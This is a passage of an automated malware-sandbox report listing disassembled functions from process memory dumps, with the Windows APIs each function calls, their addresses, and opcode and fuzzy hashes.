                                                      • GetCurrentThread.KERNEL32 ref: 016E53DD
                                                      • GetCurrentProcess.KERNEL32 ref: 016E541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 016E5473
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 4515b71e5b7c5508ebd2fd181ba3cf7c7431c8314a61f293a4c0b2634a16fba2
                                                      • Instruction ID: abc9904c033c14e151d658fcf585ab890887d7bb81bdef6e2e09afca9cc6dd41
                                                      • Opcode Fuzzy Hash: 4515b71e5b7c5508ebd2fd181ba3cf7c7431c8314a61f293a4c0b2634a16fba2
                                                      • Instruction Fuzzy Hash: 225155B49023498FDB14CFA9D948BDEBFF0BB49318F24815EE409A76A1DB746844CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E5340, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 016E53A0
                                                      • GetCurrentThread.KERNEL32 ref: 016E53DD
                                                      • GetCurrentProcess.KERNEL32 ref: 016E541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 016E5473
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 834b185a6940829ea6da189dac3d14ade240dcdc2b75834e11049430d876a864
                                                      • Instruction ID: 3a62cc763bec17e981a8a89326a9682337727eaccee1ee5eb773aa5c71c18d93
                                                      • Opcode Fuzzy Hash: 834b185a6940829ea6da189dac3d14ade240dcdc2b75834e11049430d876a864
                                                      • Instruction Fuzzy Hash: B95134B49016498FDB14CFA9D948BDEBBF0BB48318F20855EE40AB77A0DB746844CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E3A86, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E3BA2
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 4dfb7f957906c91279a51531f701f63ab8ce0d46946899cf2025a6ddca1fa23d
                                                      • Instruction ID: 75e4c2a902f431c9c82c68917a7b91d1b3c860297eeba5f61c1d580d88a5b792
                                                      • Opcode Fuzzy Hash: 4dfb7f957906c91279a51531f701f63ab8ce0d46946899cf2025a6ddca1fa23d
                                                      • Instruction Fuzzy Hash: 1951CDB1D113499FDF14CFA9C884ADEBBB5BF88314F24822AE819AB310D7759945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E3A90, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 016E3BA2
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: c65936b2d8883009e8b25da5e93a8871c9296c4e56e972a4d577e054fc9d2f75
                                                      • Instruction ID: 0a6b02b37334e12d23ef03d590ad084a5c6121281f01d51f21d4f5b123db2ab1
                                                      • Opcode Fuzzy Hash: c65936b2d8883009e8b25da5e93a8871c9296c4e56e972a4d577e054fc9d2f75
                                                      • Instruction Fuzzy Hash: 4741AFB1D113499FDF14CF9AC884ADEBBB5BF48314F24822AE819AB310D775A945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E5562, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016E55EF
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 4556500ab0bbda76ff1274412413fdff4eb8d7e12e864659ee41ef81325a0ebf
                                                      • Instruction ID: 73103ca087a3644be412b43dcd4fd2a1aa07c8eb510209bc23e8d6b0abff1d65
                                                      • Opcode Fuzzy Hash: 4556500ab0bbda76ff1274412413fdff4eb8d7e12e864659ee41ef81325a0ebf
                                                      • Instruction Fuzzy Hash: 4521E5B59012489FDB10CFA9D984ADEBFF4FB48324F14805AE915A7310D374A944CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E5568, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016E55EF
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.817155779.00000000016E0000.00000040.00000001.sdmp, Offset: 016E0000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: f2acb8088de23e5b4ae8d7067178a81e441cabaa33852a4cfb8e4c29eb9f5633
                                                      • Instruction ID: 4c34d245815e7572146fa9ee498217b92bba925b7feab187a3cd30a9824d7204
                                                      • Opcode Fuzzy Hash: f2acb8088de23e5b4ae8d7067178a81e441cabaa33852a4cfb8e4c29eb9f5633
                                                      • Instruction Fuzzy Hash: 9821C4B59012489FDB10CF99D984ADEBBF4FB48324F14841AE915B3710D778A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0124D4A0, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.814400020.000000000124D000.00000040.00000001.sdmp, Offset: 0124D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 420bf59fd5986857faa46cbaa712ef4272a7261e526496e49853f8afb0bf1dee
                                                      • Instruction ID: b304f41d088e16887b75d40d73b1644a08186e4deff0f80f4c533bdc4b6c6892
                                                      • Opcode Fuzzy Hash: 420bf59fd5986857faa46cbaa712ef4272a7261e526496e49853f8afb0bf1dee
                                                      • Instruction Fuzzy Hash: 882148B1514248DFDF09CF54E8C0B66BF65FB94328F20856CE9090B206C776D845CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0124D0EC, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.814400020.000000000124D000.00000040.00000001.sdmp, Offset: 0124D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b332d711030c77207b5b1c3029428657f5c6a8e3f96b8a40248c3448d47ec92
                                                      • Instruction ID: 9cf871bbc4b5d1c4ba957037c6de272921aad3a0e0f60c0e48b88f06dfb00ba3
                                                      • Opcode Fuzzy Hash: 2b332d711030c77207b5b1c3029428657f5c6a8e3f96b8a40248c3448d47ec92
                                                      • Instruction Fuzzy Hash: D32128B1514248DFDB09DF54D8C0B26BB65FB94324F24856DED0D0B606C376D855C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0124D0E7, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.814400020.000000000124D000.00000040.00000001.sdmp, Offset: 0124D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction ID: 592aebaf7840eee1a53cabc0e67414377a375a9d1bd772e60fdc5a4f2e1f9e8b
                                                      • Opcode Fuzzy Hash: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction Fuzzy Hash: 8311EE72404284CFDB06CF44D9C0B16BF72FB94320F28C6AADD080B616C33AD45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0124D49B, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.814400020.000000000124D000.00000040.00000001.sdmp, Offset: 0124D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction ID: 4f651962a890af318217fd5c3d763a213a07eb2e996056474b40867853298f1c
                                                      • Opcode Fuzzy Hash: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction Fuzzy Hash: C411DF72804284CFDF16CF44E5C0B16BF71FB84324F2482A9D9050B616C336D456CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions